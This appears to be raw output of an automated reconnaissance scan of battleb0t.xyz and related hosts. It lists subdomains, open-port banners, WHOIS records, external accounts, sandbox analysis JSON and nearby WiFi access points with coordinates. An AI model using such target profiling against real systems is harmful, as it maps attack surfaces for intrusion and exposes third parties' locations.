</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | scratch (Category: coding)
https://scratch.mit.edu/users/Altpapier/ | Altpapier |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Hakim Evi (Net ID: 00:14:C1:2E:AE:67) | 40.2024, 29.0398 |
| 2023-05-12 02:45:09 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | Toronto, Ontario, ON, Canada, CA | 104.21.6.166 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 15:16. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
| 87.248.157.102 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | oatscream (Net ID: 00:0C:E6:39:59:E1) | 39.0469, -77.4903 |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 14061 | 46.101.128.0/17 |
| 2023-05-12 02:44:24 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.109.153 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 401 Unauthorized
Date: <REDACTED>
Server: cPanel
Persistent-Auth: false
Host: 87.248.157.102:2078
Cache-Control: no-cache, no-store, must-revalidate, private
Connection: close
Vary: Accept-Encoding
WWW-Authenticate: Basic realm="Restricted Area"
Content-Encoding: gzip
Content-Length: 52
Content-Type: text/html; charset="utf-8"
Expires: Fri, 01 Jan 1990 00:00:00 GMT
| 87.248.157.102 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:1C:05) | 50.8897, 6.0563 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RPOWER3 (Net ID: 00:02:6F:B3:3B:AA) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:19 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.110.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:54:30) | 41.8781, -87.6298 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55154C9AA (Net ID: 00:01:E3:54:C9:AA) | 52.3759, 4.8975 |
| 2023-05-12 02:44:15 | IPv6 Address | No | DNS Resolver | 16 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | nuke.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NBNCorp (Net ID: 00:09:5B:A3:EA:31) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Iceland | Domain Name: ECASH-PAY.COM
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15Z
Creation Date: 2021-04-26T06:58:38Z
Registry Expiry Date: 2024-04-26T06:58:38Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: ecash-pay.com
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15.08Z
Creation Date: 2021-04-26T06:58:38.00Z
Registrar Registration Expiration Date: 2024-04-26T06:58:38.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T10:12:16.55Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:57:26 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | teamcity.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 104.21.71.14 |
| 2023-05-12 02:55:22 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://icba.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "icba.com"\n "kenwheeler.github.io"\n "kit.fontawesome.com"\n "static.addtoany.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FCF.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar21C5.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"77.72.1.42:443"\n "142.250.189.202:443"\n "104.17.24.14:443"\n "104.16.124.175:443"\n "172.67.39.148:443"\n "142.251.214.136:443"\n "142.250.189.234:443"\n "185.199.109.153:443"\n "69.16.175.42:443"\n "104.18.22.52:443"\n "8.252.188.254:80"\n "142.251.46.227:443"\n "142.251.46.238:443"\n "172.64.169.22:443"\n "142.251.214.131:443"\n "142.251.2.157:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2060"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_80c_IE_EarlyTabStart_0xf90_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_80c_ConnHashTable<2060>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_80c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_80c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2060"\n "IsoScope_80c_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab21C4.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsicba.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "cookie-law-info-gdpr_1_.css" has type "ASCII text"- [targetUID: N/A]\n "anchor_1_.htm" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "util_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003980]\n "page_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmYUtfBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto BlackRegularVersion 2.137; 2017Roboto-Bla"- [targetUID: N/A]\n "~DFDAD05DC8204277E5.TMP" has type "data"- Location: [%TEMP%\\~DFDAD05DC8204277E5.TMP]- [targetUID: 00000000-00002060]\n "js_6_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "hand_1_.png" has type "PNG image data 237 x 204 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "jquery-migrate.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "news-default_1_.png" has type "PNG image data 550 x 400 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "js_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "regenerator-runtime.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "home-america0_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] baseline precision 8 1514x813 components 3"- [targetUID: N/A]\n "cropped-icba-favicon-32x32_1_.png" has type "PNG image data 32 x 32 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tick_1_.png" has type "PNG image data 16 x 16 8-bit/color RGBA interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://icba.com/"\n Pattern match: "https://icba.com"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "icba.com"\n Heuristic match: "kenwheeler.github.io"\n Heuristic match: "kit.fontawesome.com"\n Heuristic match: "static.addtoany.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 2, u'size': None, u'job_id': u'63ec913036565a096c7515a3', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'77.72.1.42', u'142.250.189.202', u'104.17.24.14', u'104.16.124.175', u'172.67.39.148', u'142.251.214.136', u'142.250.189.234', u'185.199.109.153', u'69.16.175.42', u'104.18.22.52', u'8.252.188.254', u'142.251.46.227', u'142.251.46.238', u'172.64.169.22', u'142.251.214.131', u'142.251.2.157'], u'sha256': u'6c9318f0a4bac85f99d6040d1988a710d4f868d1e8e1a0bd50397a2df8b3073a', u'sha512': u'92c6d135a7f7364930a9be30552e09343d2f1cbfac310b763eb7280776f4205078448c64d65c324ff4902984bb4eba0f74fb83932d50bf02f71b8b980e2479bf', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://icba.com/', u'submission_id': u'63ec913036565a096c7515a4', u'created_at': u'2023-02-15T08:00:48+00:00', u'filename': None}], u'analysi | 185.199.109.153 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/nwp.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:32:00 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.1:80 | 188.114.97.0/24 |
| 2023-05-12 03:01:26 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | nwapi2.battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c572ccdc9c6e26c-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Ashburn Square WiFi (Net ID: 00:0C:66:13:0B:72) | 39.0469, -77.4903 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | x-nf-request-id: 01H06Y2YH7X6V06YSWWEW2NH9C | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-nf-request-id": "01H06Y2YH7X6V06YSWWEW2NH9C", "content-type": "text/css; charset=UTF-8", "age": "0"} |
| 2023-05-12 03:32:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.13:443 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | NotABug (Category: coding)
https://notabug.org/login | login |
| 2023-05-12 02:53:52 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 2606:50c0:8003::153 |
| 2023-05-12 03:23:50 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.20:8443 | 188.114.96.0/24 |
| 2023-05-12 02:54:19 | HTTP Headers | No | Web Spider | 6 | 0 | 2 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} | fluid.battleb0t.xyz |
| 2023-05-12 02:44:24 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-cache-status: REVALIDATED | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/master058_3.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.241): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:58:15 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 65, u'compromised_hosts': [u'34.148.97.127', u'34.148.97.127'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://favicon.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2648"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a58_IE_EarlyTabStart_0xf0c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a58_ConnHashTable<2648>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a58_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a58_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2648"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a58_IE_EarlyTabStart_0xf0c_Mutex"\n "IsoScope_a58_ConnHashTable<2648>_HashTable_Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:80"\n 